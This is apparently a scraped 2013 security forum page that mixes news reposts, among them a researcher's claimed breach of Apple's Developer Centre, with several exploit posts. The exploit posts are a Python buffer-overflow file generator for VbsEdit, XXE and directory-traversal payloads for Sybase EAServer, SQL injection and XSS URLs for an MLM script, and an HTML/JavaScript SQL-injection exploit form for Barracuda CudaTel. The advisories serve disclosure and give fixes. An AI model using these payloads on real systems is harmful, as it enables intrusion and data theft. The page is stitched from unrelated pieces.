detecting a marked spike in the number of watering hole attacks targeting industry. Sursa V3.co.uk

E mai usor de verificat si nu se vor risca cacatii.

Sistemul de donatii este cam riscant parerea mea.Vor dori unii sa doneze dupa carduri furate sau bani facuti prin cine stie ce metode. Cel mai bine e pe incredere. Vrea cineva sa doneze , ii da frumos un pm lui Nytro si tranzactia se face intre cei doi. Scurt si la subiect.

'I have 100,000+ users' details ... please don't blacklist me' A Turkish security bod calling himself Ibrahim Balic claims his bug reports to Apple sparked the shutdown of Cupertino's Developer Centre website. The iPhone giant pulled the plug on its online home for app programmers last Thursday fearing someone was attempting to hacking into its databases. Now Balic has alleged he found 13 security vulnerabilities in the system and exploited them to pull up information on 73 Apple staff. He also claimed he gained access to more than 100,000 developers' private data. But he insists he did this to demonstrate the apparent flaws - reported via bugreport.apple.com - and uploaded a video to protest his innocence (since removed). In an extended mea culpa written after the initial media storm over the Developer Centre outage, the London-based researcher huffed: "I'm not feeling very happy with what I read and I'm a bit irritated, as I did not do this research [to cause] harm or damage. "I didn't attempt to publish or share this situation with anybody else. My aim was to report bugs and collect the data for the purpose of seeing how deep I can go within this scope. I have over 100,000 users' details and Apple is informed about this. I didn't attempt to get the data first and report then, instead I have reported first." Balic claims the developer website was shutdown just four hours after he contacted Apple; he added that the fondleslab titan did not respond to his bug reports. The Reg cannot confirm his allegations, and Apple has not yet commented on Balic's claims. He added: "I do not want my name to be on a blacklist. I'm keeping all the evidence, emails and images. Also I have the records of the bugs that I made through Apple's bug-report [system]." Security market expert Graham Cluley has predicted that Apple may be tempted to take tough action to dissuade any other researchers from probing too hard. He wrote: "Balic may not have been motivated by malice if he did, as appears to be the case, exploit a security hole in Apple’s Developer Centre. But he clearly was operating without Apple’s permission. "As such, the extracting of developers’ personal data from the site could be argued to be unauthorised access, and Apple could – if it wanted – pursue legal action against the researcher. "Whether Apple will choose to pursue legal action in this case remains to be seen. Although it may be bad for its brand image to pursue a researcher who doesn’t appear to have had cybercrime in mind, Apple is a very strange company. Who can forget when Apple encouraged police to look into the loss of its iPhone prototype in a bar, which resulted in the editor of Gizmodo having his house raided?" "Apple is under new management now, but the possibility remains that it may want to make an example of him," he added. Sursa TheRegister.co.uk

Data to and from Google's servers now accounts for a quarter of all US internet traffic, according to the latest network analysis by monitoring firm DeepField, with over 60 per cent of all end users and their devices having some business with the Chocolate Factory every day. "While it is old news that Google is BIG, the sheer scale and dominance of Google in the Internet infrastructure has significant implications on network design and evolution," said DeepField founder Craig Labovitz in a blog post. In 2010, back when Labovitz was at doing a similar study for Arbor networks, Google accounted for just 6 per cent of internet traffic, which was big, but still behind the largest ISP. In three years, the Chocolate Factory has expanded its reach dramatically, and Labovitz said the figures understate Google's bigger network share in PC and mobile data. Google's position isn't just down to basic internet traffic, Labovitz said. Mountain View's analytics, hosting, and advertising services are used by over half of US websites and services, all of which adds to "Google’s growing and pervasive dominance." The Chocolate Factory is not the biggest bandwidth hog; that prize goes to Netflix, the report found. Traffic from the video-streaming service peaks at US prime time and during cache-update periods, but in terms of overall network traffic, Google could now be considered bigger than Netflix, Twitter, and Facebook combined, he said. So what's changed in the last three years? Well, YouTube accounts for a very significant chunk of Google's network traffic in a way similar to Netflix. But Labovitz suggests that Google's rollout of smaller servers to internet service providers, its Google Global Cache (GGC) system, helps account for a lot of the rise. The GGC servers cache a continuously updated collection of Google's most popular content, and are placed with over half of ISPs in the US, as well as in European and South American networks. This speeds access time, but Labovitz notes the Chocolate Factory is also slapping up data centers at a high rate to feed this edge demand. What matters, of course, is that Google can turn this traffic into money at a faster rate than its network costs. In last week's financial results, the company reported healthy profits, but also a rise in capital expenditure to $1.6bn and falling cost-per-click revenues. ® Sursa TheRegister.co.uk

Author : d3b4g Source : VbsEdit 5.9.3 (.smi) - Buffer Overflow Vulnerability Code : # Exploit Title: VbsEdit 5.9.3(.smi file handling) Buffer overflow vulnerability # Date: 22.7.2013 # Exploit Author: d3b4g # Vendor Homepage:http://www.vbsedit.com/ # Software Link: http://www.vbsedit.com/ # Tested on: Windows XP SP3 # Twitter: @schaba #!/usr/bin/python # Tested on: win XPsp3 chars = "A"*90000 crush = "\x41\x41\x41\x41" file=open('exp.smi','w') file.write(chars+crush+chars) file.close()

Author : SEC Consult Source : Sybase EAServer 6.3.1 - Multiple Vulnerabilities Code : SEC Consult Vulnerability Lab Security Advisory < 20130719-0 > ======================================================================= title: Multiple vulnerabilities product: Sybase EAServer vulnerable version: <=6.3.1 fixed version: vendor did not supply version information CVE number: - impact: critical homepage: [url=http://www.sybase.com]Enterprise Data Management, Analysis and Mobilization Software - Sybase Inc[/url] found: 10/2012 by: Gerhard Wagner, Bernhard Mueller SEC Consult Vulnerability Lab [url]https://www.sec-consult.com[/url] ======================================================================= Vendor description: ------------------- Sybase EAServer fully supports all the Web services standards and enables enterprises to rapidly expose business functions as Web services. EAServer also provides a graphical interface to automate the publication and management of your company’s Web services. Today, EAServer supports EJB and Java/CORBA components, CICS integrator, and database stored procedures. These stored procedures can be from all Sybase’s databases including ASE, SQL Anywhere, and IQ; in addition, they will support IBM, Oracle, and Microsoft. EAServer can also support iAnywhere messaging services, enabling the developer to expose these components as Web services. Business recommendation: ------------------------ The default applications that are deployed by default during the installation of Sybase EAServer should be removed. Further, it is recommended to test the patches provided by Sybase. Vulnerability overview/description: ----------------------------------- 1) Directory traversal In order to use a common web server such as IIS as a fronted and forward only certain requests to the Sybase EAServer it is a common practice to install and configure the EAServer redirector plug-in. An incoming request will be received by the web server, validated if it matches any context configured within the redirector plug-in and if so forwarded to the appropriate application context. So a request such as the following will be forwarded by the redirector plug-in in case the configuration contains such an application. [url]https://example.com/myapp[/url] -> [url]https://myEAServer/myapp[/url] If the request contains a path like "/\.." the redirector plug-in is not normalising the path as a part of the "myapp" application. Therefore, the request will be passed on to the Sybase EAServer where backslash as well as forward slash are valid directory separators and therefore using such a method it is possible to access all deployed applications. [url]https://example.com/myapp/%5C../another_application[/url] 2) XML entity injection Due to insufficient input validation it is possible to pass external entity definitions to the server-side XML processor for REST requests with an XML media type. By calling the built-in function testDataTypes() an attacker can list directories and display arbitrary files on the affected system, as long as the files don't conflict with the UTF-8 encoding. 3) OS command execution The WSH service allows to run OS commands and it can only be accessed providing administrative credentials. Using the XXE vulnerability mentioned before it is potentially possible to retrieve the credentials from configuration files and run OS commands using the WSH service. Proof of concept: ----------------- 1) Directory traversal The following request allows to access the Sybase EAServer management application: [url]https://example.com/myapp/%5C../console/Login.jsp[/url] Also the other applications that come by default with Sybase EAServer can be accessed using their respective context for example: /rest /wsh /wsf ... 2) XML entity injection The following XML message displays the contents of the drive C: on a Windows system: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///C:\">]> <lol> <dt> <stringValue>&xxe;</stringValue> <booleanValue>0</booleanValue> </dt> </lol> 3) OS command execution Due to the potential impact the proof-of-concept has been removed. Vulnerable / tested versions: ----------------------------- The issues have been tested in Sybase EAServer 6.3.1 on Windows. Vendor contact timeline: ------------------------ 2013-03-11: Contact the vendor and provide vulnerability information 2013-06-11: Vendor fixes the issues 2013-06-28: Agreement on disclosure date 2013-07-19 2013-07-19: Public disclosure Solution: --------- According to the vendor customers can download the latest patches from [url=http://www.sybase.com/downloads]Sybase Software Downloads and Code Samples - Database and Mobility Software - Sybase Inc[/url]. The patches have not been tested by SEC Consult. Advisory URL: ------------- [url]https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm[/url] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: [url]https://www.sec-consult.com[/url] Blog: [url=http://blog.sec-consult.com]SEC Consult[/url] Twitter: [url]https://twitter.com/sec_consult[/url] EOF G. Wagner / @2013]

Author : 3spi0n Source : MLM (Multi Level Marketing) Script - Multiple Vulnerabilities Code : ################################################################################## _____ _ _ _ _____ | __ \ | | | | (_) / ____| | |__) |_____ _____ | |_ _| |_ _ ___ _ __ | (___ ___ ___ | _ // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \ \___ \ / _ \/ __| | | \ \ __/\ V / (_) | | |_| | |_| | (_) | | | | ____) | __/ (__ |_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___| ################################################################################## MLM (Multi Level Marketing) Script, Multiple Vulnerabilities Product Page: http://www.mlmscript.in/ Author(Pentester): 3spi0n On Web: RevolutionSec.Com - GraySecure.Org On Social: Twitter.Com/eyyamgudeer ################################################################################## [1] SQL Injection Vulnerabilities on Demo Site [+] (productview.php, prdid Param) >>> http://server/product/version2/productview.php?prdid='1 [+] (productview.php, uid param) >>> http://server/product/version2/profileview.php?uid='1 [2] Xss (Cross Site Scripting) Vulnerability on Demo Site [+] (regcheck_email.php, email param) >>> http://server/product/version2/regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E

Author : Vulnerability-Lab Source : Barracuda CudaTel 2.6.02.040 - SQL Injection Vulnerability Code : Title: ====== Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability Date: ===== 2013-07-20 References: =========== http://vulnerability-lab.com/get_content.php?id=775 BARRACUDA NETWORK SECURITY ID: BNSEC-723 VL-ID: ===== 775 Common Vulnerability Scoring System: ==================================== 8.6 Introduction: ============= Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server s enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution With an expansive feature set and and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers. (Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx ) Abstract: ========= 1.1 The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. 1.2 The Vulnerability Laboratory Research Team discovered a client side vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. Report-Timeline: ================ 2012-11-26: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2012-11-27: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program) 2012-12-01: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program) 2013-03-01: Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: Dave Farrow] 2013-07-20: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Barracuda Networks Product: CudaTel - Communication Server 2.6.002.040 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== 1.1 A SQL Injection vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application. The vulnerability allows remote attackers or local low privilege application user accounts to inject (execute) own SQL commands to the affected application dbms. The blind sql injection vulnerability is located in the cdr module when processing to request manipulated row & page parameters as searchstring. A remote attacker can for example delete the standard value context of the module request to inject (execute) own sql commands. Eploitation of the vulnerability requires a low privilege web application user account and no user interaction. Successful exploitation of the vulnerability results in datbase management system and web application compromise. Vulnerable Section(s) [+] search - listing Vulnerable Module(s) [+] cdr - seachstring listing Vulnerable Parameter(s) [+] &row [+] &page 1.2 A client side input validation vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application. The non-persistent vulnerability allows remote attackers to manipulate client side application requests to browser. The secound vulnerability (client side) is located in the invalid value exception handling. Remote attackers can provoke the exception-handling by including invalid script code inputs to redisplay the malicious context when processing to load the output. To provoke the exception-handling the remote attacker can use the vulnerable row parameter of the cdr searchstring listing to execute own malicious (client-side) script code. Exploitation of the vulnerability requires a no web application user account but medium or high user interaction. Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side external redirects to malware or malicious websites. Exploitation requires medium user interaction. Vulnerable Section(s): [+] search - listing Vulnerable Module(s): [+] cdr - seachstring listing Vulnerable Parameter(s): [+] &row Affected Module(s): [+] Exception-Handling (invalid value) Proof of Concept: ================= 1.1 The sql injection vulnerability can be exploited by remote attackers with low privilege web application user account and without user interaction. For demonstration or reproduce ... Standard Request: Row 100 http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page=1&sortby=end_timestamp&sortorder=desc Standard Request: Output --- 1. {"count":0,"page":"1","cdr":[],"rows":"100"} Manipulated Request: http://cudatel.127.0.0.1:1337/gui/cdr/cdr? _=1353973149509&since=1+day&search_string=&rows=100&page='1+1%27[SQL-Injection!]%27--&sortby=end_timestamp&sortorder=desc ... or http://cudatel.127.0.0.1:1337/gui/cdr/cdr? %20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows='1+1%27[SQL-Injection!]%27--&page=1&sortby=end_timestamp&sortorder=desc Manipulated Output: --- 1. cdr: [] count: 0 page: 1 rows: 1+2 --- 1. cdr: [] count: 1+2' page: - '1335 - '1336 - '1337 - '1 rows: -1+1'[SQL-Injection!]'-- Exploit (PoC): <html><head><body><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9"> <title>Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection [PROOF OF CONCEPT]</title> <script language="JavaScript"> var path="/gui/cdr/cdr" var adres="?%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows=" var domain ="http://cudatel.127.0.0.1:1337" var sql = "'1+1%27[SQL-Injection!]%27--" function command(){ if (document.rfi.target1.value==""){ alert("NOPE!"); return false; } rfi.action= document.rfi.target1.value+path+adres+domain+sql; rfi.submit(); } //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Vulnerability Research Laboratory (www.vulnerability-lab.com) //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD. & Stealthwalker //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- </script></head><body bgcolor="#000000" link="#990000"> <center><p align="center"><b><font face="Verdana" size="2" color="#006633">Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit</font> </b></p><form method="post" target="getting" name="rfi" onSubmit="command();"><div align="left"> <p><b><font face="Arial" size="2" color="#006633">VICTIM:</font></b> <input type="text" name="target1" size="53" style="background-color: #006633" onMouseOver="javascript:this.style.background='#808080';" onMouseOut="javascript:this.style.background='#808000';"></p> <p><b><font face="Arial" size="2" color="#006633">EXAMPLE:</font><font face="Arial" size="2" color="#808080"> HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]/</font></b></p></div> <p align="left"><input type="submit" value="Execute INPUT" name="B1"> </p><p align="left"><input type="reset" value="Clear ALL" name="B2"></p></form><p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe></p><div align="left"> <p align="center"><b><font face="Verdana" size="2" color="#008000">VULNERABILITY-LAB <a href="mailto:research@vulnerability-lab.com"> BKM</a></font></b></p></div></center></body></html> 1.2 The client side input validation vulnerability can be exploited by remote attackers without application user account and with medium required user interaction. For demonstration or reproduce ... PoC: http://cudatel.127.0.0.1:1336/gui/cdr/cdr? _=1353973149509&since=1+day&search_string=&rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&page=1&sortby=end_timestamp&sortorder=desc http://cudatel.127.0.0.1:1336/gui/cdr/cdr? _=1353973149509&since=1+day&search_string=&rows=100&page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&sortby=end_timestamp&sortorder=desc Note: We only verified the bug with the same exception in a not parsed parameter but the bug itself is located in all areas of the invalid exception. Solution: ========= 1.1 To patch the sql injection it is required to parse the row and page parameters in the cdr module. 1.2 To fix the client side xss vulnerability parse by encoding the row parameter and restrict the input. Encode the affected exception-handling output listing when processing to display invalid input values. Note: Barracuda Networks provided an update of version 2.6.002.040 to v2.6.003.x to all clients and customers in the bn customer area. Risk: ===== 1.1 The security risk of the remote sql injection web vulnerability is estimated critical. 1.2 The security risk of the client side input validation web vulnerability is estimated as medium(-). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright ? 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com